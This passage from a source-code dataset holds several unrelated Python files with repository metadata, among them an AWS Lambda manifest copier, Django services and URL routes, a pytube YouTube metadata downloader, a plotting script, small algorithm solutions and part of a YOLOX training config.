padx=20)\n\n app.ctkcheck_critical = customtkinter.CTkCheckBox(master=app.ctkf_form_content,\n text=\"Critico\")\n app.ctkcheck_critical.grid(row=6, column=1, sticky=\"we\", pady=10, padx=20)\n\n app.ctkb_create = customtkinter.CTkButton(master=app.ctkf_form_content,\n text=\"Criar\", command=app.save_result)\n app.ctkb_create.grid(row=7, column=0, pady=10, padx=20, sticky=\"nsew\")\n\n return ctk_frame\n\n \n","repo_name":"GuilhermeTagliati/Python_for_Non_Programmers","sub_path":"01_NON_CONFORMITIES_PROJECT/role model 
project/views/main_page.py","file_name":"main_page.py","file_ext":"py","file_size_in_byte":4252,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"43206327230","text":"# Currently unused function to implement env manifest copying for use as S3 source artifact\nimport boto3\nfrom io import BytesIO\nimport os\nimport zipfile\nimport logging\n\ndef lambda_handler():\n\n logger = logging.getLogger()\n logger.setLevel(logging.DEBUG)\n\n account = boto3.client(\"sts\").get_caller_identity()[\"Account\"]\n region = os.environ[\"AWS_REGION\"]\n target_bucket_name = f\"serverbot2-pipeline-manifest-copy-{account}-{region}\"\n logger.debug(f\"Generated bucket name is {target_bucket_name}\")\n\n ssm = boto3.client(\"ssm\")\n manifest_string = ssm.get_parameter(Name=\"DeploymentEnvironmentManifest\")[\"Parameter\"][\"Value\"]\n # Avoid posting actual content to logs\n logger.debug(f\"Got manifest string, length={len(manifest_string)}\")\n\n logger.debug(\"Creating zip data...\")\n zipped_data = BytesIO()\n zip = zipfile.ZipFile(zipped_data, \"w\")\n zip.writestr(\"manifest.json\", manifest_string)\n zip.close()\n\n logger.debug(\"Pushing to S3...\")\n s3 = boto3.client(\"s3\")\n s3.put_object(\n Bucket=target_bucket_name,\n Key=\"manifest.zip\",\n Body=zipped_data\n )\n","repo_name":"HtyCorp/serverbot2-core","sub_path":"deployment/application-infrastructure/src/main/resources/manifest_copy_function/lambda_function.py","file_name":"lambda_function.py","file_ext":"py","file_size_in_byte":1120,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"69"}
+{"seq_id":"71962933341","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport torch as th\n\nimport data\nimport models\n\nplt.rcParams.update({\n \"text.usetex\": True,\n})\nplt.rcParams['axes.titlepad'] = 2\n\nsigmas = [0, .025, .05, .1, .2]\nN = len(sigmas)\nplt.rcParams[\"axes.prop_cycle\"] = plt.cycler(\n \"color\", plt.cm.coolwarm(np.linspace(0, 1, N))\n)\n\nkernel_size = 7\nn_f = kernel_size**2 - 1\nbs = 64 * 4000\npatch_size = kernel_size\ncolor = False\nrotate = True\nflip = True\nn_w = 63 * 2 - 1\nn_scales = 20\n\ndataset = data.BSDS(color, bs, patch_size, rotate, flip)\ngamma = 1.\nR_gsm = models.ProductGSM(\n n_f=n_f,\n bound_norm=False,\n zero_mean=True,\n ortho=True,\n n_scales=n_scales,\n kernel_size=kernel_size,\n K_init='random',\n).cuda()\nth.set_grad_enabled(False)\n\nstate = th.load('./out/gsm/state_final.pth')\nstate['w.w'] = state['w']\nR_gsm.load_state_dict(state)\nR_gmm = models.ProductGMM(\n n_f=n_f,\n bound_norm=False,\n zero_mean=True,\n symmetric=True,\n ortho=True,\n vmin=-1,\n vmax=1,\n kernel_size=kernel_size,\n K_init='random',\n n_w=n_w,\n w_init='student-t',\n sigmas=th.Tensor(sigmas)\n).cuda()\nth.set_grad_enabled(False)\n\nstate = th.load('./out/patch/state_final.pth')\nR_gmm.load_state_dict(state)\nylims_f_ = {\n 'gmm': [-.2, 10],\n 'gsm': [-.2, 6],\n}\nylims_fp_ = {\n 'gmm': [-20, 20],\n 'gsm': [-9.5, 9.5],\n}\nylims_tweedie_ = {\n 'gmm': [-1, 1],\n 'gsm': [-1, 1],\n}\nfor y in dataset:\n break\ndm = 0.01\nbin_edges = th.linspace(\n -gamma - dm / 2,\n gamma + dm / 2,\n n_w + 1,\n).cuda()\nx_hist = (bin_edges[1:] + bin_edges[:-1]) / 2\nfor R, name in zip([R_gmm, R_gsm], ['gmm', 'gsm']):\n hist = th.zeros((len(sigmas), n_f, n_w)).cuda()\n ylims_f = ylims_f_[name]\n ylims_fp = ylims_fp_[name]\n ylims_tweedie = ylims_tweedie_[name]\n for i_s, sigma in enumerate(sigmas):\n R.set_sigma(sigma)\n Kx = R.K(y + sigma * th.randn_like(y))\n\n for k in range(n_f):\n hist[\n i_s,\n k] = th.histogram(Kx[:, k].reshape(-1).cpu(),\n bin_edges.cpu())[0].to('cuda')\n\n fs = []\n fps = []\n K = R.K.weight.data\n scale = 1.1\n\n n_points = 20\n x = th.linspace(\n -scale * gamma,\n scale * gamma,\n n_points**2,\n dtype=K.dtype,\n device=K.device,\n )[None].repeat(n_f, 1)\n for sig in sigmas:\n R.set_sigma(sig)\n f, fp = R.pot_act(x.view(1, n_f, n_points, n_points))\n f = f.view(n_f, n_points * n_points)\n fp = fp.view(n_f, n_points * n_points)\n fs.append(f)\n fps.append(fp)\n\n x = x[0]\n\n fs = th.stack(fs).permute(1, 0, 2)\n fps = th.stack(fps).permute(1, 0, 2)\n norm_k = (K**2).sum((1, 2, 3))\n indices = th.sort(norm_k)[1]\n K = K[indices]\n fs = fs[indices]\n fps = fps[indices]\n hist = hist.permute(1, 0, 2)\n hist = hist[indices]\n\n fig_k, ax_k = plt.subplots(3, 16, figsize=(16, 3))\n fig_f, ax_f = plt.subplots(3, 16, figsize=(16, 3))\n fig_fp, ax_fp = plt.subplots(3, 16, figsize=(16, 3))\n fig_tweedie, ax_tweedie = plt.subplots(3, 16, figsize=(16, 3))\n fig_h, ax_h = plt.subplots(3, 16, figsize=(16, 3))\n\n for i, (ff, ffp, hh, kk) in enumerate(zip(fs, fps, hist, K)):\n r, c = divmod(i, 16)\n for sigma, fff, fffp, hhh in zip(sigmas, ff, ffp, hh):\n neg_log = -th.log(hhh).detach().cpu().numpy()\n neg_log -= neg_log.min()\n fff -= fff.min()\n ax_h[r, c].plot(x_hist.cpu(), neg_log)\n ax_f[r, c].plot(x.cpu(), fff.cpu())\n ax_fp[r, c].plot(x.cpu(), fffp.cpu())\n ax_tweedie[r, c].plot(\n x.cpu(),\n x.cpu().numpy() - sigma**2 * fffp.cpu().numpy()\n )\n for axx, ylims in zip([ax_f, ax_h, ax_fp, ax_tweedie],\n [ylims_f, ylims_f, ylims_fp, ylims_tweedie]):\n 
axx[r, c].set_ylim(ylims)\n axx[r, c].grid(True)\n if (r, c) == (2, 0):\n xt = axx[r, c].get_xticklabels()\n if (r, c) != (2, 0):\n axx[r, c].tick_params(tick1On=False)\n axx[r, c].set_xticklabels([])\n axx[r, c].set_yticklabels([])\n axx[r, c].set_frame_on(False)\n\n k_plot = ax_k[r, c].imshow(kk.cpu().squeeze(), cmap='gray')\n ax_k[r, c].axis('off')\n ax_k[r, c].set_title(\n f'\\\\( [{kk.min().item()*10:.1f}, {kk.max().item()*10:.1f}] \\\\)',\n fontsize=8\n )\n\nplt.show()\n","repo_name":"VLOGroup/PoGMDM","sub_path":"draw.py","file_name":"draw.py","file_ext":"py","file_size_in_byte":4552,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"34234050003","text":"from ..models import ETL_Dataset\nfrom ..serializers import ETL_DatasetSerializer\n\n\nclass ETL_DatasetService():\n\n @staticmethod\n def is_datasetname_avalaible(input__datasetname):\n try:\n existing_etl_dataset = ETL_Dataset.objects.filter(dataset_name=str(input__datasetname).strip())[0]\n return False\n except:\n return True\n\n\n @staticmethod\n def does_etl_dataset_exist__by_uuid(input__uuid):\n try:\n existing_etl_dataset = ETL_Dataset.objects.filter(uuid=str(input__uuid).strip())[0]\n return True\n except:\n return False\n\n @staticmethod\n def create_etl_dataset_from_datasetname_only(input__datasetname, created_by=\"create_dataset_from_datasetname_only\"):\n try:\n new_etl_dataset = ETL_Dataset()\n new_etl_dataset.dataset_name = str(input__datasetname).strip()\n new_etl_dataset.created_by = str(created_by).strip()\n new_etl_dataset.save()\n\n return True, new_etl_dataset.uuid\n except:\n return False, \"\"\n\n @staticmethod\n def get_all_etl_datasets_preview_list():\n ret_list = []\n try:\n all_datasets = ETL_Dataset.objects.all()\n for current_dataset in all_datasets:\n ret_list.append(ETL_DatasetSerializer(current_dataset).data)\n except:\n ret_list = []\n return ret_list\n\n @staticmethod\n def is_a_valid_subtype_string(input__string):\n try:\n input__string = str(input__string).strip()\n valid_subtypes_string_list = ETL_DatasetService.get_all_subtypes_as_string_array()\n if input__string in valid_subtypes_string_list:\n return True\n except:\n return False\n\n @staticmethod\n def get_all_subtypes_as_string_array():\n return list(\n ETL_Dataset.objects.order_by('dataset_subtype').values_list('dataset_subtype', flat=True).distinct())\n","repo_name":"SERVIR/ClimateSERV2","sub_path":"api/services/etl_dataset_service.py","file_name":"etl_dataset_service.py","file_ext":"py","file_size_in_byte":1988,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"69"}
+{"seq_id":"18728927783","text":"from abc import ABCMeta, abstractmethod\n\nfrom domain.model.article import Article, ArticleRepository\n\n\nclass Clock(metaclass=ABCMeta):\n @abstractmethod\n def now(self) -> float:\n pass\n\n\nclass ArticleService:\n def __init__(self, article_repository: ArticleRepository, clock):\n self._article_repository = article_repository\n self._clock = clock\n\n def create_article(self, title, description, body, author_id) -> Article:\n slug = title.lower().replace(' ', '-')\n if self._article_repository.exists_by_slug(slug):\n raise ArticleExistedException(\"the article with slug {} already exists\".format(slug))\n article = Article(slug, title, description, body, author_id)\n now = self._clock.now()\n article.created_at = now\n article.updated_at = now\n return self._article_repository.save(article)\n\n\nclass ArticleExistedException(Exception):\n def __init__(self, message):\n super().__init__(message)\n","repo_name":"mgxian/implementation-patterns-python","sub_path":"domain/service/article.py","file_name":"article.py","file_ext":"py","file_size_in_byte":986,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"73627182941","text":"class Solution:\n def getConcatenation(self, word: str) -> int:\n asciiNums = \"\"\n for e in word:\n asciiNums += str(ord(e)-97)\n # print(\"ascii num: \"+asciiNums)\n return int(asciiNums)\n def isSumEqual(self, firstWord: str, secondWord: str, targetWord: str) -> bool:\n firstNum = self.getConcatenation(firstWord)\n secondNum = self.getConcatenation(secondWord)\n targetNum = self.getConcatenation(targetWord)\n if firstNum + secondNum == targetNum:\n return True\n return False\n\nX = Solution() \n\nfirstWord = \"acb\"\nsecondWord = \"cba\"\ntargetWord = \"cdb\"\nprint(X.isSumEqual(firstWord, secondWord, targetWord))\n\nfirstWord = \"aaa\"\nsecondWord = \"a\"\ntargetWord = \"aab\"\nprint(X.isSumEqual(firstWord, secondWord, targetWord))\n\nfirstWord = \"aaa\"\nsecondWord = \"a\"\ntargetWord = \"aaaa\"\nprint(X.isSumEqual(firstWord, secondWord, targetWord))","repo_name":"awesome-liuxiao/leetcodesolution","sub_path":"1880_chkWordEqSumOfTwoWords.py","file_name":"1880_chkWordEqSumOfTwoWords.py","file_ext":"py","file_size_in_byte":914,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"10982292679","text":"from typing import final\nfrom cursor import CursorDelPool\nimport xml.etree.ElementTree as ET\nfrom logger_base import log\nfrom catalogo import Catalogo\n\nclass Conversor:\n\n\n _INSERTAR = 'INSERT INTO catalogo(common, botanical, zone, light, price, availability) VALUES(%s,%s,%s,%s,%s,%s)'\n _xml_data = None\n\n\n @classmethod\n def insertar(cls, planta):\n with CursorDelPool() as cursor:\n valores = (planta.find(\"COMMON\").text, planta.find(\"BOTANICAL\").text, planta.find(\"ZONE\").text, planta.find(\"LIGHT\").text, planta.find(\"PRICE\").text, planta.find(\"AVAILABILITY\").text)\n #print(valores)\n cursor.execute(cls._INSERTAR, valores)\n return cursor.rowcount\n\n @classmethod\n def leerxml(cls, xml_file):\n try:\n if xml_file.readable():\n cls._xml_data = ET.fromstring(xml_file.read())\n lista_plantas = cls._xml_data.findall('PLANT')\n for planta in lista_plantas:\n cls.insertar(planta)\n log.debug('Datos insertados correctamente')\n else:\n log.debug(False)\n except Exception as e:\n log.debug(f'Se ha producido un error {e}')\n finally:\n xml_file.close()\n\n\nif __name__ == '__main__':\n\n ruta = str(input('Ruta de archivo a ingresar: '))\n archivo = open(ruta)\n conversor = Conversor.leerxml(archivo)\n\n","repo_name":"romerodeveloper/Conversor_Archivos","sub_path":"conversor_xml.py","file_name":"conversor_xml.py","file_ext":"py","file_size_in_byte":1417,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"16624564866","text":"tcs = int(input())\nfor tc in range(tcs):\n\tn = int(input())\n\tA = []\n\tC = []\n\tids = []\n\tfor _ in range(n):\n\t\tarr = input().split()\n\t\tcolor = arr[0]\n\t\tdurability = int(arr[1])\n\t\tid = int(arr[2])\n\t\tA.append((color, id))\n\t\tC.append((durability, id))\n\t\tids.append(id)\n\n\tA.sort()\n\tC.sort()\n\n\tres = 0\n\tfor i in range(n):\n\t\tif A[i][1] == C[i][1]:\n\t\t\tres += 1\n\t\n\tprint('Case #{}: {}'.format(tc + 1, res))","repo_name":"chungwwei/cp-qs","sub_path":"round_f_2022/a.py","file_name":"a.py","file_ext":"py","file_size_in_byte":394,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"26731788071","text":"from pytube import YouTube\nfrom datetime import datetime\nfrom mysql.connector.types import RowType\nimport time\nimport logging\nimport sys\nimport os\n\n\nsys.path.append(os.getcwd())\nfrom Models.DatabaseHandler import Database_Handler\nfrom Models.Logger import Extractio_Logger\n\n\n\nclass YouTube_Downloader:\n \"\"\"\n It will handle every operations related to YouTube.\n \"\"\"\n __uniform_resource_locator: str\n \"\"\"\n The uniform resource locator to be searched.\n \"\"\"\n __video: YouTube\n \"\"\"\n Core developer interface for pytube.\n \"\"\"\n __title: str\n \"\"\"\n The title of the video.\n \"\"\"\n __identifier: str\n \"\"\"\n The identifier of the video.\n \"\"\"\n __length: int\n \"\"\"\n The length of the video in seconds.\n \"\"\"\n __duration: str\n \"\"\"\n The duration of the video in the format of HH:mm:ss.\n \"\"\"\n __published_at: str | datetime | None\n \"\"\"\n The date at which the video has been published.\n \"\"\"\n __database_handler: Database_Handler\n \"\"\"\n It is the object relational mapper that will be used to\n simplify the process to entering queries.\n \"\"\"\n __author: str\n \"\"\"\n The author of the video/music.\n \"\"\"\n __media_identifier: int\n \"\"\"\n The media type for the system.\n \"\"\"\n __timestamp: str\n \"\"\"\n The timestamp at which the session has been created.\n \"\"\"\n __directory: str\n \"\"\"\n The directory of the media files.\n \"\"\"\n __logger: Extractio_Logger\n \"\"\"\n The logger that will all the action of the application.\n \"\"\"\n\n def __init__(self, uniform_resource_locator: str, media_identifier: int):\n \"\"\"\n Instantiating the class and launching the operations needed.\n\n Parameters:\n uniform_resource_locator: (string): The uniform resource locator to be searched.\n media_identifier: (int): The media type for the system.\n \"\"\"\n self.setLogger(Extractio_Logger())\n self.getLogger().setLogger(logging.getLogger(__name__))\n self.setDatabaseHandler(Database_Handler())\n self.setUniformResourceLocator(uniform_resource_locator)\n self.setMediaIdentifier(media_identifier)\n self.getLogger().inform(\"The Downloader has been initialized\")\n\n def getUniformResourceLocator(self) -> str:\n return self.__uniform_resource_locator\n\n def setUniformResourceLocator(self, uniform_resource_locator: str) -> None:\n self.__uniform_resource_locator = uniform_resource_locator\n\n def getVideo(self) -> YouTube:\n return self.__video\n\n def setVideo(self, video: YouTube) -> None:\n self.__video = video\n\n def getTitle(self) -> str:\n return self.__title\n\n def setTitle(self, title: str) -> None:\n self.__title = title\n\n def getIdentifier(self) -> str:\n return self.__identifier\n\n def setIdentifier(self, identifier: str) -> None:\n self.__identifier = identifier\n\n def getLength(self) -> int:\n return self.__length\n\n def setLength(self, length: int) -> None:\n self.__length = length\n\n def getDuration(self) -> str:\n return self.__duration\n\n def setDuration(self, duration: str) -> None:\n self.__duration = duration\n\n def getPublishedAt(self) -> str | datetime | None:\n return self.__published_at\n\n def setPublishedAt(self, published_at: str | datetime | None) -> None:\n self.__published_at = str(published_at)\n\n def getDatabaseHandler(self) -> Database_Handler:\n return self.__database_handler\n\n def setDatabaseHandler(self, database_handler: Database_Handler) -> None:\n self.__database_handler = database_handler\n\n def getAuthor(self) -> str:\n return 
self.__author\n\n def setAuthor(self, author: str) -> None:\n self.__author = author\n\n def getMediaIdentifier(self) -> int:\n return self.__media_identifier\n\n def setMediaIdentifier(self, media_identifier: int) -> None:\n self.__media_identifier = media_identifier\n\n def getTimestamp(self) -> str:\n return self.__timestamp\n\n def setTimestamp(self, timestamp: str) -> None:\n self.__timestamp = timestamp\n\n def getDirectory(self) -> str:\n return self.__directory\n\n def setDirectory(self, directory: str) -> None:\n self.__directory = directory\n\n def getLogger(self) -> Extractio_Logger:\n return self.__logger\n\n def setLogger(self, logger: Extractio_Logger) -> None:\n self.__logger = logger\n\n def retrieveIdentifier(self, identifier: str) -> str:\n \"\"\"\n Retrieving the identifier of the content in the condition\n that it is in a playlist.\n\n Parameters:\n identifier: (string): The ID of the content.\n\n Return:\n (string)\n \"\"\"\n if \"&\" in identifier:\n return identifier.rsplit(\"&\", 1)[0]\n else:\n return identifier\n\n def search(self) -> dict[str, str | int | None]:\n \"\"\"\n Searching for the video in YouTube.\n\n Return:\n (object)\n \"\"\"\n response: dict[str, str | int | None]\n audio_file: str | None\n video_file: str | None\n self.setVideo(YouTube(self.getUniformResourceLocator()))\n self.setIdentifier(self.getUniformResourceLocator())\n if \"youtube\" in self.getUniformResourceLocator():\n self.setIdentifier(\n self.retrieveIdentifier(\n self.getIdentifier().replace(\n \"https://www.youtube.com/watch?v=\",\n \"\"\n )\n )\n )\n else:\n self.setIdentifier(\n self.getIdentifier().replace(\n \"https://youtu.be/\",\n \"\"\n ).rsplit(\"?\")[0]\n )\n meta_data = self.getYouTube()\n if meta_data[\"status\"] == 200:\n self.setLength(int(meta_data[\"data\"][0][4])) # type: ignore\n self.setPublishedAt(str(meta_data[\"data\"][0][3])) # type: ignore\n self.setAuthor(str(meta_data[\"data\"][0][0])) # type: ignore\n self.setTitle(str(meta_data[\"data\"][0][1])) # type: ignore\n self.setDuration(\n time.strftime(\"%H:%M:%S\", time.gmtime(self.getLength()))\n )\n File_Location = self._getFileLocations(meta_data[\"data\"]) # type: ignore\n audio_file = File_Location[\"audio_file\"]\n video_file = File_Location[\"video_file\"]\n else:\n self.setLength(self.getVideo().length)\n self.setPublishedAt(self.getVideo().publish_date)\n self.setAuthor(self.getVideo().author)\n self.setTitle(self.getVideo().title)\n self.setDuration(\n time.strftime(\"%H:%M:%S\", time.gmtime(self.getLength()))\n )\n audio_file = None\n video_file = None\n self.postYouTube()\n response = {\n \"uniform_resource_locator\": self.getUniformResourceLocator(),\n \"author\": self.getAuthor(),\n \"title\": self.getTitle(),\n \"identifier\": self.getIdentifier(),\n \"author_channel\": self.getVideo().channel_url,\n \"views\": self.getVideo().views,\n \"published_at\": str(self.getPublishedAt()),\n \"thumbnail\": self.getVideo().thumbnail_url,\n \"duration\": self.getDuration(),\n \"audio_file\": audio_file,\n \"video_file\": video_file\n }\n return response\n\n def _getFileLocations(self, result_set: list[RowType]) -> dict[str, str | None]:\n \"\"\"\n Extracting the file locations on the application's directory.\n\n Parameters:\n result_set: (array): The data from the database server.\n\n Return:\n (string)\n \"\"\"\n response: dict[str, str | None]\n if len(list(result_set)) == 2:\n response = {\n \"audio_file\": str(result_set[0][5]),\n \"video_file\": str(result_set[1][5])\n }\n else:\n response = {\n 
\"audio_file\": None,\n \"video_file\": None\n }\n return response\n\n def getYouTube(self) -> dict[str, int | list[RowType] | str]:\n \"\"\"\n Retrieving the metadata from the YouTube table.\n\n Return:\n (object)\n \"\"\"\n response: dict[str, int | list[RowType] | str]\n filter_parameters = tuple([self.getIdentifier()])\n media = self.getDatabaseHandler().get_data(\n parameters=filter_parameters,\n table_name=\"YouTube\",\n join_condition=\"MediaFile ON MediaFile.YouTube = YouTube.identifier\",\n filter_condition=\"YouTube.identifier = %s\",\n column_names=\"author, title, YouTube.identifier, published_at, length, location\",\n sort_condition=\"MediaFile.identifier ASC\",\n limit_condition=2\n )\n self.setTimestamp(datetime.now().strftime(\"%Y-%m-%d - %H:%M:%S\"))\n self.getLogger().inform(\n f\"The media content has been retrieved from the database server!\\nContent Amount: {len(media)}\\nCurrent Media: {media}\"\n )\n if len(media) == 0:\n response = {\n 'status': 404,\n 'data': media,\n 'timestamp': self.getTimestamp()\n }\n else:\n response = {\n 'status': 200,\n 'data': media,\n 'timestamp': self.getTimestamp()\n }\n return response\n\n def postYouTube(self) -> None:\n \"\"\"\n Creating a record for the media with its data.\n\n Return:\n (void)\n \"\"\"\n data = (\n self.getIdentifier(),\n self.getLength(),\n self.getPublishedAt(),\n self.getAuthor(),\n self.getTitle(),\n self.getMediaIdentifier()\n )\n self.getLogger().inform(\n f\"Data to be inserted into the database server.\\nIdentifier: {self.getIdentifier()}\\nLength: {self.getLength()}\\nPublished At: {self.getPublishedAt()}\\nAuthor: {self.getAuthor()}\\nTitle: {self.getTitle()}\\nMedia's Identifier: {self.getMediaIdentifier()}\"\n )\n self.getDatabaseHandler().post_data(\n table=\"YouTube\",\n columns=\"identifier, length, published_at, author, title, Media\",\n values=\"%s, %s, %s, %s, %s, %s\",\n parameters=data\n )\n","repo_name":"DONALDBZR/ytd_web_app","sub_path":"Auto/Classes/YouTubeDownloader.py","file_name":"YouTubeDownloader.py","file_ext":"py","file_size_in_byte":10545,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"37981257780","text":"# -*- coding: gb18030 -*-\n#\n# $Id: $\n\n\"\"\"\n\"\"\"\nfrom Function import Function\nfrom bwdebug import *\nimport BigWorld\nimport csconst\nimport csstatus\nimport csdefine\nimport utils\n\nclass FuncLeavePrison( Function ):\n\t\"\"\"\n\t离开监狱\n\t\"\"\"\n\tdef __init__( self, section ):\n\t\t\"\"\"\n\t\tparam1: CLASS_*\n\n\t\t@param param: 由实现类自己解释格式; param1 - param5\n\t\t@type param: pyDataSection\n\t\t\"\"\"\n\t\tself.param01 = section.readInt( \"param1\" ) # 小于某个pk值才显示选项\n\t\tself.spaceName = section.readString( \"param2\" )\n\t\tself.pos = None\n\t\tself.direction = None\n\t\t\n\t\tposition = section.readString( \"param3\" )\n\t\tpos = utils.vector3TypeConvert( position )\n\t\tif pos is None:\n\t\t\tERROR_MSG( \"Vector3 Type Error:%s Bad format '%s' in section param3 \" % ( self.__class__.__name__, position ) )\n\t\telse:\n\t\t\tself.pos = pos\n\t\t\n\t\tdirection = section.readString( \"param4\" )\n\t\tdir = utils.vector3TypeConvert( direction )\n\t\tif dir is None:\n\t\t\tERROR_MSG( \"Vector3 Type Error:%s Bad format '%s' in section param4 \" % ( self.__class__.__name__, direction ) )\n\t\telse:\n\t\t\tself.direction = dir\n\n\tdef do( self, player, talkEntity = None ):\n\t\t\"\"\"\n\t\t执行一个功能\n\n\t\t@param player: 玩家\n\t\t@type player: Entity\n\t\t@param talkEntity: 一个扩展的参数\n\t\t@type talkEntity: entity\n\t\t@return: None\n\t\t\"\"\"\n\t\tplayer.endGossip( talkEntity )\n\t\tif player.pkValue >= self.param01:\n\t\t\tplayer.statusMessage( csstatus.PRISON_LEAVE_VALID, self.param01 )\n\t\t\treturn\n\n\t\tplayer.setTemp( \"leavePrison\", True )\n\t\tplayer.gotoSpace( self.spaceName, self.pos, self.direction )\n\n\tdef valid( self, player, talkEntity = None ):\n\t\t\"\"\"\n\t\t检查一个功能是否可以使用\n\n\t\t@param player: 玩家\n\t\t@type player: Entity\n\t\t@param talkEntity: 一个扩展的参数\n\t\t@type talkEntity: entity\n\t\t@return: True/False\n\t\t@rtype:\tbool\n\t\t\"\"\"\n\t\treturn True\n\n\n\n#","repo_name":"mudsave/csol2_enities_45541","sub_path":"cell/Resource/FuncsModule/FuncLeavePrison.py","file_name":"FuncLeavePrison.py","file_ext":"py","file_size_in_byte":1763,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"13715946004","text":"import sys\n\ninput = sys.stdin.readline\n\n\ndef sort_order(i):\n return (-i[1], i[2], -i[3], i[0])\n\n\nN = int(input().rstrip())\nstudents = [0] * N\nfor i in range(N):\n name, kor, eng, math = input().split()\n kor, eng, math = map(int, [kor, eng, math])\n students[i] = [name, kor, eng, math]\nstudents.sort(key=sort_order)\nfor student in students:\n print(student[0])\n","repo_name":"nnoobbaagguu/Algorithm","sub_path":"Baekjoon Online Judge/10825.py","file_name":"10825.py","file_ext":"py","file_size_in_byte":373,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"71065842461","text":"from django.conf.urls import patterns, include, url\nfrom flights.views import Index, Detail, Contact, Filter, Notifications, SignIn, SignUp, SignOut\nfrom django.conf import settings\nfrom django.conf.urls.static import static\nfrom django.views.generic import TemplateView\nfrom django.contrib.auth.decorators import login_required\n\n\n# Uncomment the next two lines to enable the admin:\nfrom django.contrib import admin\nfrom flights.api import QPXResource, SliceResource\nfrom location.api import CityResource, CountryResource, CurrencyResource\nadmin.autodiscover()\n\nurlpatterns = patterns('',\n url(r'^admin/doc/', include('django.contrib.admindocs.urls')),\n url(r'^admin/', include(admin.site.urls)),\n url(r'^$', Index.as_view(), name='index'),\n url(r'^contact$', Contact.as_view(), name='contact'),\n url(r'^notifications$', Notifications.as_view(), name='notifications'),\n url(r'^(?P\\d+)/$', Detail.as_view(), name='detail'),\n url(r'^price/(?P\\d+)/$', Filter.as_view(), name='filter'),\n url(r'^signin/$', SignIn.as_view(), name='signin'),\n url(r'^signup/$', SignUp.as_view(), name='signup'),\n url(r'^price/(?P\\d+)/$', Filter.as_view(), name='filter'),\n url(r'^leaving-date/(?P[0-9\\-_]+)/$', Filter.as_view()),\n url(r'^city/(?P[A-z]+)/$', Filter.as_view()),\n url(r'^signout/$', SignOut.as_view()),\n url(r'^api/qpx/', include(QPXResource.urls())),\n url(r'^api/slices/', include(SliceResource.urls())),\n url(r'^api/currenies/', include(CurrencyResource.urls())),\n url(r'^api/countries/', include(CountryResource.urls())),\n url(r'^api/cities/', include(CityResource.urls())),\n url(r'^thanks',TemplateView.as_view(template_name='flights/generic.html'),name='thanks'),\n url(r'^account',login_required(TemplateView.as_view(template_name='flights/generic.html')),name='thanks'),\n\n ) + static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)\n","repo_name":"colins44/passportfriday","sub_path":"passportfridays/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1935,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"17172138645","text":"#!/usr/bin/env python3\r\n# -*- coding:utf-8 -*-\r\n# Copyright (c) 2014-2021 Megvii Inc. All rights reserved.\r\n\r\nimport os\r\nimport random\r\n\r\nimport torch\r\nimport torch.distributed as dist\r\nimport torch.nn as nn\r\n\r\nfrom .base_exp import BaseExp\r\n\r\n\r\nclass Exp(BaseExp):\r\n def __init__(self):\r\n super().__init__()\r\n\r\n # ---------------- model config ---------------- #\r\n self.num_classes = 80\r\n self.depth = 1.00\r\n self.width = 1.00\r\n\r\n # ---------------- dataloader config ---------------- #\r\n # set worker to 4 for shorter dataloader init time\r\n self.data_num_workers = 4\r\n self.input_size = (640, 640)\r\n # Actual multiscale ranges: [640-5*32, 640+5*32].\r\n # To disable multiscale training, set the\r\n # self.multiscale_range to 0.\r\n self.multiscale_range = 5\r\n # You can uncomment this line to specify a multiscale range\r\n # self.random_size = (14, 26)\r\n self.data_dir = None\r\n self.train_ann = \"instances_train2017.json\"\r\n self.val_ann = \"instances_val2017.json\"\r\n\r\n # --------------- transform config ----------------- #\r\n self.mosaic_prob = 1.0\r\n self.mixup_prob = 1.0\r\n self.hsv_prob = 1.0\r\n self.flip_prob = 0.5\r\n self.degrees = 10.0\r\n self.translate = 0.1\r\n self.mosaic_scale = (0.1, 2)\r\n self.mixup_scale = (0.5, 1.5)\r\n self.shear = 2.0\r\n self.perspective = 0.0\r\n self.enable_mixup = True\r\n\r\n # -------------- training config --------------------- #\r\n self.warmup_epochs = 5\r\n self.max_epoch = 300\r\n self.warmup_lr = 0\r\n self.basic_lr_per_img = 0.01 / 64.0\r\n self.scheduler = \"yoloxwarmcos\"\r\n self.no_aug_epochs = 15\r\n self.min_lr_ratio = 0.05\r\n self.ema = True\r\n\r\n self.weight_decay = 5e-4\r\n self.momentum = 0.9\r\n self.print_interval = 10\r\n self.eval_interval = 10\r\n self.exp_name = os.path.split(os.path.realpath(__file__))[1].split(\".\")[0]\r\n\r\n # ----------------- testing config ------------------ #\r\n self.test_size = (640, 640)\r\n self.test_conf = 0.01\r\n self.nmsthre = 0.65\r\n\r\n def get_model(self):\r\n from models import YOLOX, YOLOPAFPN, YOLOXHead\r\n\r\n def init_yolo(M):\r\n for m in M.modules():\r\n if isinstance(m, nn.BatchNorm2d):\r\n m.eps = 1e-3\r\n m.momentum = 0.03\r\n\r\n if getattr(self, \"model\", None) is None:\r\n in_channels = [256, 512, 1024]\r\n backbone = YOLOPAFPN(self.depth, self.width, in_channels=in_channels)\r\n head = YOLOXHead(self.num_classes, self.width, in_channels=in_channels)\r\n self.model = YOLOX(backbone, head)\r\n\r\n self.model.apply(init_yolo)\r\n self.model.head.initialize_biases(1e-2)\r\n return 